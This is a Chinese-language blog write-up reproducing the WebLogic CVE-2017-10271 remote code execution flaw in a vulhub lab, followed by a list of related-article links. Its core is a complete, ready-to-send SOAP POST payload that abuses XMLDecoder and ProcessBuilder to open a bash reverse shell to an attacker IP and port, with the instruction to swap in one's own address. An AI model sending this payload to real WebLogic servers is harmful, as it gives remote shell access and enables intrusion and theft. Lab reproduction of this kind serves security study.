影响版本
OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0

攻击种类
远程命令执行漏洞

复现过程
搭建
我使用的是vulhub搭建的
官网是http://vulhub.org
路径

然后

就可安装了
dcoker ps 看看端口

访问http://ip:7001
这就是搭建成功了

数据包

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.101.24:7001
Content-Type: text/xml
Connection: close
Content-Length: 640<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.101.247/2233 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

修改ip和port 就不会错


这是成功后之我想到要是不反弹shell而是单纯的执行命令,网上全是反弹shell的
我在网上找到bash 命令其中 -c 参数是我想要的 可以把字符当作命令执行

参考
https://www.freebuf.com/vuls/303796.html
https://vulhub.org/#/environments/weblogic/CVE-2017-10271/

漏洞复现-远程代码执行-CVE-2017-10271-Weblogic相关推荐

  1. linux内核远程漏洞,CVE-2019-11815:Linux内核竞争条件漏洞导致远程代码执行

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 运行了Linux发行版的计算机设备,如果内核版本小于5.0.8的话,将有可能受到一 ...

  2. linux内核竞争条件漏洞,Linux内核竞争条件漏洞-导致远程代码执行

    原标题: Linux内核竞争条件漏洞-导致远程代码执行 导读*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 运行了Linux发行版 ...

  3. commons-collections反序列化漏洞分析——远程代码执行

    commons-collections反序列化漏洞分析--远程代码执行 命令执行以及通过反射进行命令执行 这里先说说java里面的命令执行.其实java的命令执行和PHP类似,PHP一般通过eval和 ...

  4. php5.2 $_GET漏洞,ThinkPHP5 远程代码执行漏洞-动态分析

    0x01 前言 ThinkPHP官方最近修复了一个严重的远程代码执行漏洞.这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本 ...

  5. 远程命令执行漏洞与远程代码执行漏洞33333

    远程命令执行漏洞的概念 远程命令执行漏洞,指用户通过浏览器提交执行操作命令, 由于服务器端,没有针对执行函数做过滤,就执行了恶意命令 远程代码执行漏洞概念 代码执行漏洞也叫代码注入漏洞,指用户通过浏览 ...

  6. rmi远程代码执行漏洞_WebSphere 远程代码执行漏洞浅析(CVE20204450)

    作者:beijixiong404    文章来源:先知社区 漏洞简介 WebSphere是IBM的软件平台,它包含了编写.运行和监视全天候的工业强度的随需应变 Web 应用程序和跨平台.跨产品解决方案 ...

  7. rmi远程代码执行漏洞_fastjson远程代码执行漏洞复现

    漏洞原理fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存 ...

  8. DedeCMS历史漏洞复现之代码执行漏洞

    本文介绍的漏洞虽然不是最新漏洞,但意在让初学者了解漏洞复现的基本流程. 首先了解一下什么是CMS.CMS是Content Management System的缩写,意为"内容管理系统&quo ...

  9. [vulfocus漏洞复现]thinkcmf 代码执行漏洞复现 (CVE-2019-7580)phpinfo();ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPH

    前言 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发 ...

最新文章

  1. 你准备好持续交付(CD)了吗?
  2. Win7安装golang开发环境--备忘录
  3. [杂笔]我的第一篇博客
  4. HTML5日期输入类型
  5. 软件工程实践2017结对作业
  6. 文献记录(part67)--基于决策树模型重用的分布变化流数据学习
  7. mysql old key files_mysql出现“Incorrect key file for table”解决办法
  8. 【英语学习】【Level 07】U06 First Time L6 Not your typical experience
  9. 哈工大计算机学院2021复试分数线,哈尔滨工业大学2021年考研复试分数线
  10. ros自定义service消息.srv文件中增加自定义.msg消息
  11. centos6.5搭建lnmp过程
  12. 5个导致主线程卡顿较鲜为人知的元凶
  13. PSPNet | 语义分割及场景分析
  14. java hashmap value排序_按照Value对HashMap排序
  15. Java(但行好事 莫问前程) 1
  16. vue3.0 axios 图片上传
  17. Python基础知识之面向对象编程介绍(二)
  18. Chrome前端插件
  19. js计算当月有几周并显示对应的日期
  20. 连接不上服务器怎么办?

热门文章

  1. Web 前端代码规范
  2. stream().map
  3. 小羊驼和你一起学习cocos2d-x之三(进度条、CCProgressTimer)
  4. 监听页面关闭和刷新的总结
  5. 反垃圾邮件软件_网络安全界的扛把子!大蜘蛛杀毒软件!货硬,价更香!
  6. Web学习第四天——CSS简介、选择器,常用(文本、字体、列表、背景、超链接)样式
  7. 对话中科易安市场经理:联网智能门锁之运行、运营与运维
  8. 福昕PDF阅读器又更新了,终于等到这个功能了!
  9. css transform属性详解
  10. html使用base64编码的图片显示